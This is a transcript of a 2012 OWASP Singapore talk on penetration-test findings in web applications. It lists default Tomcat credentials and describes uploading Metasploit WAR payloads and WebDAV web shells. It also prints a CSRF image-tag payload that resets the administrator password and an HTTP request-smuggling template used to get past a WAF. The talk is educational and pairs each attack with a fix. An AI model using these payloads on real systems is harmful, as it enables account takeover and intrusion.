a rojak of singapore web exploits - security … on port 8080 (apache tomcat) try default usernames...
TRANSCRIPT
A Rojak of Singapore Web Exploits
Ryan Baxendale – OWASP Singapore
14th November 2012
Who Am I?
I am Ryan
I live in Singapore
Security Consultant at Security-Assessment.com
I find bugs in web applications and hack things
Agenda
Today's rojak includes bugs in
1. Microsoft SharePoint (Top10-A6-Security Misconfiguration)
2. Administrative Interfaces (Top10-A6-Security Misconfiguration)
3. JavaScript Encryption (Top10-A3-Broken Authentication)
4. “Too” Factor Authentication (Top10-A3-Broken Authentication)
5. Password Reset (XSRF + Horrible password reset)
6. 2 Requests Are Better Than 1 (WAF Bypass)
Microsoft SharePoint
Intranet content management
and document management
SharePoint can be used to
provide:
intranet portals, document & file
management, collaboration, social
networks, extranets, websites,
enterprise search, and business
intelligence
'Publishing' feature can be used
to manage larger public website
You might not know that site xyz is
running on SharePoint
Microsoft SharePoint
Intranet content management
and document management
SharePoint can be used to
provide:
intranet portals, document & file
management, collaboration, social
networks, extranets, websites,
enterprise search, and business
intelligence
'Publishing' feature can be used
to manage larger public website
You might not know that site xyz is
running on SharePoint
Microsoft SharePoint
Find additional functionality through the SharePoint site
Try all the default or well know SharePoint pages:
/AllItems.aspx
/Common.aspx
/MyPage.aspx
/recyclebin.aspx
…
Nice list from
Stach&Liu – SharePoint Hacking Diggity Project
Also try to look for the admin web interface on a high port,
although probably not available over internet due to firewall
Microsoft SharePoint
isaca.org/_layouts/mobile/mbllists.aspx
Username
Microsoft SharePoint
Upload your own page, edit pages
The user that
created and
modified this
item
Links to internal
team sites and other
confidential things
Create a new
page, edit a
page
Microsoft SharePoint
Find list of user accounts, guess passwords, get access
All the site content, pages,
things that should not be
seen by the public, etc
I want to hack
this account
This is the list of users
from Active Directory
Microsoft SharePoint
Don’t have internal or confidential information on external
facing SharePoint sites
Firewall admin port
ACL to block external IP addresses
accessing SharePoint pages
Administrative Interfaces
Manage web applications and content
on web servers
Admin interfaces let you run your own web
shell
OWASP states the following objectives:
Administrator level functions are
appropriately segregated from user activity
Users cannot access or utilize administrator
functionality
(boring..) Provide necessary audit and
traceability of administrative functionality
Administrative Interfaces
Links to
admin
interfaces
Documentation,
if you need
help haxx0ring
Upload
metasploit
payload
Usually on port 8080 (Apache Tomcat)
Try default usernames and passwords (tomcat:tomcat,
admin:tomcat, both:tomcat, manager:tomcat, etc)
Administrative Interfaces
Create a metasploit payload
WAR file and upload
Administrative Interfaces
Create a metasploit payload
WAR file and upload
Administrative Interfaces
Create a metasploit payload
WAR file and upload
Administrative Interfaces
HTTP Methods (WebDAV)
PUT – Put a file on the server, a web shell perhaps?
DELETE – Delete a file
INDEX – List the files
PROPFIND – Find files, discover backup files
IIS 6.0
WebDAV by default only supports static Web pages, not dynamic
pages (ASP)
Administrative Interfaces
Generate metasploit payload
Fix the payload
Upload with Cadaver
Run the payload
Administrative Interfaces
Generate metasploit payload
Fix the payload
Upload with Cadaver
Run the payload
Administrative Interfaces
Guess usernames and
passwords with hydra/medusa
then “PUT” a web shell
Password protected WebDAV methods
Nobody knew that the server had this functionality
So nobody changed the password
Administrative Interfaces
Find WebDAV enabled servers with metasploit
Administrative Interfaces
Don’t let users connect to admin interfaces
Firewall rules
https://www.owasp.org/index.php/Administrative_Interface
JavaScript Encryption
JavaScript runs on the client side (browser)
<script> ... JavaScript ... </script>
JavaScript debuggers
Firebug (Firefox)
Chrome developer tools
Internet Explorer
View source
JavaScript Encryption
Client: “We don’t use SSL/TLS because we have
encrypted passwords”
Implemented in JavaScript
Takes the first character of the username/password ex. ‘a’ and
changes it to ‘23’
Separates characters with ‘0’
‘admin’ gets sent as ‘2305060340560’, ‘a’ = 23, ‘d’ = 5, ‘m’ = 6...
“admin”… Seems like the password starts with “admin” too..
JavaScript Encryption
I broke your JavaScript encryption with a l33t BlackHat
HaXx0r tool called...
Microsoft Excel
JavaScript Encryption
JavaScript with Public/Private key encryption Hey ;)
Here’s my public key
User : AsianGirl2012
Password: ChickenRice1
User : J#^ZML@)*FMA&
Password: acE($2mvT$^m!fG
Encrypt( Public Key , Credentials )
} {
??? Decrypt( Private Key , Credentials )
User : AsianGirl2012
Password: ChickenRice1 } { Where is the
chicken rice?
JavaScript Encryption
A substitution cipher is not encryption
JavaScript makes secret keys visible to the user
Use public/private key encryption in JavaScript
“Too” Factor Authentication
Two-factor authentication requires the use of two of the three
authentication factors:
Something the user knows (password, PIN);
Something the user has (ATM card, smart card); and
Something the user is (biometric characteristic, such as a fingerprint)
Most of the time it ends up being knows (password) and has
(token)
“Too” factor authentication is...
“Too” Factor Authentication
First login/signup for “Too” factor
authentication Login with “Too” factor
authentication
“Too” Factor Authentication
First login/signup for “Too” factor
authentication Login with “Too” factor
authentication
“Too” Factor Authentication
First login/signup for “Too” factor
authentication Login with “Too” factor
authentication
“Too” Factor Authentication
First login/signup for “Too” factor
authentication Login with “Too” factor
authentication
Verbose error
message and step by
step authentication
“Too” Factor Authentication
Aban
Abbas
Abbud
Abbudin
Abdul
Abdel
Abdal
Abdul
Adl
Abdul-Ahad
Abdul-Alim
Abdul-Aliyy
Abdul-Azim
Abdul-Aziz
Find a list of common names for the typical customers
Burp Intruder
Send every name as the username
Look at the response
Now we know all the
usernames
Continue by doing the
same thing on the next
step of this broken
authentication
“Too” Factor Authentication
But wait there’s more…
“Too” Factor Authentication
Some things are just not the same
2FA is a combination of two: know, have, is
Password Reset
Password reset
Typically an admin function to change a user’s password to a randomly
generate password and securely transmit the new password to the
user
A typical reset password page for a user
Asks for email/username, maybe a secret question
Sends unique password reset link to email address
A typical change password page
Asks for old password, new password, confirm your new password
Password Reset
Once upon a time a lazy developer needed to create a reset
password page
“Lets just take the change password page and make a few changes”
Great idea!......for pen testers
If a typical change password page takes username (from
session), old password, new password and confirmed new
password as input...
Creating a password reset page would only need the following input:
username and new password
Password Reset
Password reset page accepted the following:
Hidden input, useraccount to administrator – because we are the
admin right?
Hidden input, oldPassword to administrator
Set Password and confirmpasswd to the new password
Set userID to the victim’s username
Lets get access to the admin account with Cross Site Request
Forgery (XSRF/CSRF)
Create a image tag with a request to change the password
<img
src="https://website/LoginServlet?action=resetpassword&user
account=administrator&oldPassword=administrator&Passwor
d=password4444&confirmpasswd=password4444&userID=ad
ministrator&CALLER=" />
Password Reset
To get it working:
Admin needs to view a page with the CSRF img tag
Must be logged into the application in the same web
browser
Possible ways to share your img tag
Web forum
Profile signature
Create a note with HTML editor (tinymce)
Send a personal message
You get to login as Administrator with password4444
Password Reset
Don’t be a lazy developer
2 Requests Are Better Than 1
One day I was testing a web application
It gets tested often
And by lots of different people/companies
So at this point its one of the most boring (secure)
applications a pen tester can come across
2 Requests Are Better Than 1
I found a directory traversal bug where I request for
/app/test../../../ and I get a directory listing
This wasn’t too interesting because I could only see the
directory listing, but never access those files or folders
Something strange was going on...
2 Requests Are Better Than 1
Then using Burp Intruder with a list of common files and
folders (such as the dirBuster wordlist)
Found /app/test../../../console
2 Requests Are Better Than 1
This bug was only in the UAT environment
I need to get this bug working in production
There's a web application firewall (WAF) that looks at all the
requests and decides if they should be forwarded on to the
web server
So how do we trick the WAF into forwarding anything
But the client has a WAF, so they’re safe right?...
2 Requests Are Better Than 1
There’s a strange bug in a few webservers
“… Reports indicate that Microsoft IIS 5.0 truncates requests that contain
a body of greater than 48 KB in length. After 49152 bytes of a request
body are handled, IIS terminates the request and starts to parse a new
request.” (1)
“… There appears to be a bug … strangely, IIS/5.0 silently truncates the
body after 48K (49,152 bytes) … we can smuggle a request in the last
x bytes of the body.” (2)
“If the size of the request exceeds a particular threshold (by default, 48
KB), then the ISAPI or CGI code to which the request is directed needs to
be aware of chunked-transfer encoding to process the request correctly.”
(3)
(1) - www.symantec.com/security_response/attacksignatures/detail.jsp?asid=21219
(2) - www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf
(3) - hostingadministration.blogspot.sg/2008/01/urlscan-security-tool-faq.html
2 Requests Are Better Than 1
A basic HTTP POST request before smuggling:
POST /crosstraining/aboutyou2.php HTTP/1.1
Host: www.webscantest.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.webscantest.com/crosstraining/aboutyou2.php
Cookie: SESSIONID_VULN_SITE=4vdvho53o3vk9tjr94lks786q3
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
returnto=aboutyou2.php&fname=Ryan&nick=Security-Assessment&lname=OWASP&submit=submit
2 Requests Are Better Than 1
The idea is to send one big evil request, and a normal request
directly after it
The big evil request has to be more than 48kb
We have to include what we need to send (parameters etc)
Then fill the rest of the space with garbage
POST /test../../../console/adminlogin.jsp HTTP/1.1
Host: ….
Content-length: 49152
username=admin&password=admin&ThisIs48kbOfGarbage
ThisIs48kbOfGarbage ThisIs48kbOfGarbage ThisIs48kbOfGarbage
ThisIs48kbOfGarbage……
GET /happy.nice.users.normal.page.jsp HTTP/1.1
Host:…
2 Requests Are Better Than 1
48kb in bytes is 49152.
The first request must be larger than
48kb, and the content-length must be
larger than 48kb
Uncheck “Update Content-Length”
We want to manually specify that it’s a
bit more than 48kb
This is our malicious request
Now we fill the request with
48kb of garbage -----------------------(snip)------------------------
This is our “normal” request that returns
404, but allows us to get our “evil”
request to the web server
2 Requests Are Better Than 1
Response from the server
As if we sent a normal request
Probably using IIS 5 or 6 with custom ISAPI filters or an
appliance such as CheckPoint FW-1 with “Web Intelligence”
Now lets login
2 Requests Are Better Than 1
Username and password to
login
Login error
Wrong user and password
Burp Intruder to the
rescue!
Brute force the
password for admin
2 Requests Are Better Than 1
Winning!
Lets deploy our own
web app and get shell :D
2 Requests Are Better Than 1
WAF
Don’t rely on a web app firewall (WAF) to fix web app vulnerabilities
Fix the code
Recap
Microsoft SharePoint
Keep internal and external sites separate
Administrative Interfaces
Don’t let users connect to them, change default passwords
JavaScript Encryption
Don’t use your own encryption, use public/private key crypto
“Too” Factor Authentication
Remove verbosity from error messages, find out what 2FA is
Password Reset
Don’t be a lazy developer
2 Requests Are Better Than 1
A web app firewall (WAF) doesn’t fix broken code, fix the code
Questions? Comments
Contact:
Invite more people to OWASP meetings
Sign up and be active on the OWASP Singapore mailing
list
https://lists.owasp.org/mailman/listinfo/owasp-singapore
黑客 ? Think you can hack? Got talent?
We are hiring!